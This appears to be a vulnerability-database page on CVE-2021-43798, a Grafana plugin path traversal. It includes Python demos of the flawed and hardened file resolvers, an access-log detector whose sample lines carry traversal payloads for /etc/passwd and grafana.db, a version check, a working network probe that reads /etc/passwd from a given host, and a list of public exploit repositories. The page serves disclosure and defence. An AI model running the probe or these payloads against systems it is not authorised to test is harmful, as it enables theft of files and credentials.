CVE-2021-43798

Grafana path traversal

CVSS 7.5 HIGH · EPSS 88.8% · KEV · CWE-22
Summary

Grafana 8.0.0-beta1 through 8.3.0 (except the patched releases) has a flaw that lets an unauthenticated attacker read files on the server by placing directory traversal sequences in the file path that follows the plugin ID in a `/public/plugins/<plugin_id>/` URL. This bypasses the normal access controls and can expose sensitive data such as configuration files or credentials.

Technical detail

A path traversal vulnerability in Grafana's public plugin endpoint allows unauthenticated attackers to read arbitrary files: the part of the request path after `/public/plugins/<plugin_id>/` is joined onto the plugin's directory without a check that the result still lies inside it, so `..` segments walk out to any file the Grafana process can read. The vulnerability affects versions 8.0.0-beta1 through 8.3.0 (excluding the patched releases) and requires only network access to the vulnerable endpoint. The plugin ID must name an installed plugin, which is no obstacle in practice because Grafana ships with built-in plugins.
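The mechanism described above, as an added example written for this page (it is not Grafana's own code and not one of the PoCs listed further down): a file resolver that joins the request onto the plugin directory with no containment check, beside the hardened form, and the same containment rule applied to access-log lines to flag traversal attempts against `/public/plugins/`. The install layout, the plugin id `alertlist`, the secret file and the log lines are all constructed for the demonstration.

```python
"""CVE-2021-43798 mechanics: the unchecked join that lets '..' escape the
plugin directory, the containment check that stops it, and that same check
turned into an access-log detector.

Added example for this page; not Grafana's code. The directory layout,
plugin id "alertlist", secret file and log lines are constructed here.
"""
import os
import posixpath
import re
import tempfile
from urllib.parse import unquote

PLUGIN_PREFIX = "/public/plugins/"


def vulnerable_resolve(plugin_dir: str, requested: str) -> str:
    """Vulnerable pattern: join the request onto the plugin directory and
    trust the result. '..' segments walk out of plugin_dir and the caller
    opens whatever path comes back."""
    return os.path.normpath(os.path.join(plugin_dir, requested))


def hardened_resolve(plugin_dir: str, requested: str):
    """Hardened pattern: resolve symlinks, then refuse any result whose real
    path is not under plugin_dir. Returns None on escape."""
    base = os.path.realpath(plugin_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo() -> dict:
    """Fake install: <root>/data/plugins/alertlist/module.js plus a
    <root>/etc/grafana.ini that lives outside the plugin directory."""
    root = tempfile.mkdtemp()
    plugin_dir = os.path.join(root, "data", "plugins", "alertlist")
    os.makedirs(plugin_dir)
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(plugin_dir, "module.js"), "w") as f:
        f.write("// plugin code\n")
    with open(os.path.join(root, "etc", "grafana.ini"), "w") as f:
        f.write("[security]\nadmin_password = hunter2\n")  # constructed secret
    # Three '..' hops: alertlist -> plugins -> data -> root, then etc/grafana.ini
    escape = "../../../etc/grafana.ini"
    with open(vulnerable_resolve(plugin_dir, escape)) as f:
        leaked = f.read()
    return {
        "vulnerable_serves": leaked,
        "hardened_serves": hardened_resolve(plugin_dir, escape),
        "hardened_allows_legit": hardened_resolve(plugin_dir, "module.js") is not None,
    }


def requested_path_escapes(path: str) -> bool:
    """Detector: True when a /public/plugins/<id>/... request, after
    percent-decoding (twice, to catch double encoding) and POSIX
    normalisation, no longer points inside its own plugin directory."""
    decoded = unquote(unquote(path.split("?", 1)[0]))
    if not decoded.startswith(PLUGIN_PREFIX):
        return False
    rest = decoded[len(PLUGIN_PREFIX):]
    if "/" not in rest:
        return False
    plugin_id = rest.split("/", 1)[0]
    allowed = PLUGIN_PREFIX + plugin_id + "/"
    normalised = posixpath.normpath(decoded)
    return not (normalised == allowed[:-1] or normalised.startswith(allowed))


LOG_RE = re.compile(r'"(?:GET|HEAD) (?P<path>\S+) HTTP/[\d.]+"')


def scan_access_log(lines) -> list:
    """(line number, request path) for every request that escapes."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m and requested_path_escapes(m.group("path")):
            hits.append((n, m.group("path")))
    return hits


# Constructed combined-format access log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 8123',
    '203.0.113.7 - - [07/Dec/2021:10:01:09 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1823',
    '198.51.100.4 - - [07/Dec/2021:10:02:11 +0000] "GET /public/plugins/welcome/..%2F..%2F..%2F..%2Fvar/lib/grafana/grafana.db HTTP/1.1" 200 5242880',
    '198.51.100.4 - - [07/Dec/2021:10:02:30 +0000] "GET /public/plugins/welcome/img/../module.js HTTP/1.1" 200 2201',
    '192.0.2.9 - - [07/Dec/2021:10:03:00 +0000] "GET /api/health HTTP/1.1" 200 72',
]

if __name__ == "__main__":
    print(demo())
    print(scan_access_log(SAMPLE_LOG))
```

The detector deliberately normalises before comparing rather than grepping for `../`: line 4 of the sample contains a `..` but never leaves the plugin directory, while line 3 only reveals its traversal after percent-decoding. Run the detector over a reverse-proxy or Grafana access log for the exposed period; a 200 on an escaping path is a confirmed read, not just an attempt.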

Summary generated and translated by AI from the official description.
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) is vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins/<plugin_id>/`, where `<plugin_id>` is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
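Two checks a practitioner wants from the advisory text above, as an added example written for this page (not Grafana's code and not one of the PoCs listed below): a version test against the affected range, and the probe request that exercises the `/public/plugins/<plugin_id>/` path on a host you are authorised to test. Assumptions made here: later patch releases of each fixed minor are also fixed; `alertlist` and `welcome` are plugin ids present on a stock install; and `/etc/passwd` is the target, as in the public PoCs.

```python
"""Exposure checks for CVE-2021-43798. Added example for this page; not
Grafana's code. Assumptions: patch releases after the fixed ones are also
fixed; "alertlist"/"welcome" exist on a stock install; /etc/passwd is a
readable success marker on the target.
"""
import http.client
import re
from urllib.parse import quote, urlsplit

# Fixed releases named in the advisory, keyed by 8.x minor (8.0.7, 8.1.8,
# 8.2.7, 8.3.1). Assumption: any later patch of the same minor is also fixed.
PATCHED_MINIMUM = {0: 7, 1: 8, 2: 7, 3: 1}
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z0-9.]+))?")


def is_affected(version: str) -> bool:
    """True when `version` lies in 8.0.0-beta1 .. 8.3.0 minus the patched
    releases. A pre-release tag (e.g. 8.0.7-beta1) sorts before its final."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Grafana version: {version!r}")
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    if major != 8 or minor not in PATCHED_MINIMUM:
        return False  # 7.x and 8.4+ are outside the advisory's range
    fixed = PATCHED_MINIMUM[minor]
    return patch <= fixed if m.group(4) else patch < fixed


def probe_path(plugin_id: str, target: str = "/etc/passwd", depth: int = 8) -> str:
    """Request path built from the advisory's template /public/plugins/<plugin_id>/
    followed by enough '..' segments to reach the filesystem root."""
    return (f"/public/plugins/{quote(plugin_id, safe='')}/"
            + "../" * depth + quote(target.lstrip("/"), safe="/"))


def looks_like_passwd(body: bytes) -> bool:
    """Cheap success signal used by the public PoCs: a root entry in passwd."""
    return re.search(rb"^root:[^:]*:0:0:", body, re.M) is not None


def check_host(base_url: str, plugin_ids=("alertlist", "welcome"), timeout=5):
    """Send the probe for each plugin id; return details of the first hit or
    None. http.client is used so the '..' segments go on the wire verbatim
    (curl, by contrast, collapses them unless run with --path-as-is)."""
    u = urlsplit(base_url)
    conn_cls = (http.client.HTTPSConnection if u.scheme == "https"
                else http.client.HTTPConnection)
    for pid in plugin_ids:
        conn = conn_cls(u.hostname, u.port, timeout=timeout)
        try:
            conn.request("GET", probe_path(pid))
            resp = conn.getresponse()
            body = resp.read(4096)
        finally:
            conn.close()
        if resp.status == 200 and looks_like_passwd(body):
            return {"plugin_id": pid, "path": probe_path(pid), "status": resp.status}
    return None


if __name__ == "__main__":
    import sys
    for v in ("8.0.0-beta1", "8.2.6", "8.2.7", "8.3.0", "8.3.1"):
        print(v, "affected" if is_affected(v) else "not affected")
    if len(sys.argv) > 1:  # e.g. http://grafana.example:3000 (hypothetical host)
        print(check_host(sys.argv[1]))
```

The version check reads the advisory's range literally (8.0.0-beta1 to 8.3.0, minus the four fixed releases) and treats anything outside 8.x as unaffected; confirm against the GitHub Security Advisory if you run a build with a non-standard version string. The probe only confirms exposure on hosts you are authorised to test; a 404 or a redirect that strips the `..` segments is what a patched instance or a normalising reverse proxy returns.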
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Affected products
grafana · grafana
Public PoCs found: 53 (the number after each GitHub entry is its star count)

github.com/jas502n/Grafana-CVE-2021-43798 (368)
github.com/A-D-Team/grafanaExp (268)
github.com/pedrohavay/exploit-grafana-CVE-2021-43798 (46)
github.com/taythebot/CVE-2021-43798 (41)
github.com/zer0yu/CVE-2021-43798 (27)
github.com/Mr-xn/CVE-2021-43798 (24)
github.com/MoCh3n/CVE-2021-43798-grafana_fileread (17)
github.com/ScorpionsMAX/CVE-2021-43798-Grafana-POC (14)
github.com/asaotomo/CVE-2021-43798-Grafana-Exp (12)
github.com/Mo0ns/Grafana_POC-CVE-2021-43798 (9)
github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798 (8)
github.com/kenuosec/grafanaExp (6)
github.com/z3n70/CVE-2021-43798 (5)
github.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT (4)
github.com/s1gh/CVE-2021-43798 (4)
github.com/hupe1980/CVE-2021-43798 (3)
github.com/0xSAZZAD/Grafana-CVE-2021-43798 (3)
github.com/wezoomagency/GrafXploit (3)
github.com/Ryze-T/CVE-2021-43798 (2)
github.com/fanygit/Grafana-CVE-2021-43798Exp (2)
github.com/monke443/CVE-2021-43798 (2)
github.com/lfz97/CVE-2021-43798-Grafana-File-Read (1)
github.com/LongWayHomie/CVE-2021-43798 (1)
github.com/k3rwin/CVE-2021-43798-Grafana (1)
github.com/Jroo1053/GrafanaDirInclusion (1)
github.com/FAOG99/GrafanaDirectoryScanner (1)
github.com/wagneralves/CVE-2021-43798 (1)
github.com/Strikoder-Premium/Grafana-Password-Decryptor (1)
github.com/Asbawy/GrafTraverse-CVE-2021-43798 (0)
github.com/katseyres2/CVE-2021-43798 (0)
github.com/Iris288/CVE-2021-43798 (0)
github.com/Okymi-X/CVE-2021-43798 (0)
github.com/halencarjunior/grafana-CVE-2021-43798 (0)
github.com/ticofookfook/CVE-2021-43798 (0)
github.com/MalekAlthubiany/CVE-2021-43798 (0)
github.com/gixxyboy/CVE-2021-43798 (0)
github.com/hxlxmj/Grafxploit (0)
github.com/G01d3nW01f/CVE-2021-43798 (0)
github.com/mauricelambert/LabAutomationCVE-2021-43798 (0)
github.com/victorhorowitz/grafana-exploit-CVE-2021-43798 (0)
github.com/JiuBanSec/Grafana-CVE-2021-43798 (0)
github.com/davidrxchester/Grafana-8.3-Directory-Traversal (0)
github.com/ravi5hanka/CVE-2021-43798-Exploit-for-Windows-and-Linux (0)
github.com/suljov/Grafana-LFI-exploit (0)
github.com/abuyazeen/CVE-2021-43798-Grafana-path-traversal-tester (0)
github.com/0xf3d0rq/CVE-2021-43798 (0)
github.com/baktistr/cve-2021-43798-enum (0)
github.com/notbside/CVE-2021-43798-PoC (0)
github.com/Shoxake17/CVE-2021-43798 (0)
github.com/kikechans/-Grafana-LFI-CVE-2021-43798 (0)
packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html (CVE reference, unverified)
www.exploit-db.com/exploits/50581 (Exploit-DB, unverified)
packetstormsecurity.com/files/165221/Grafana-8.3.0-Directory-Traversal-Arbitrary-File-Read.html (CVE reference, unverified)
⚠ Public resources, for assessing the exposure of systems you control or are authorised to test. Test only with authorisation.
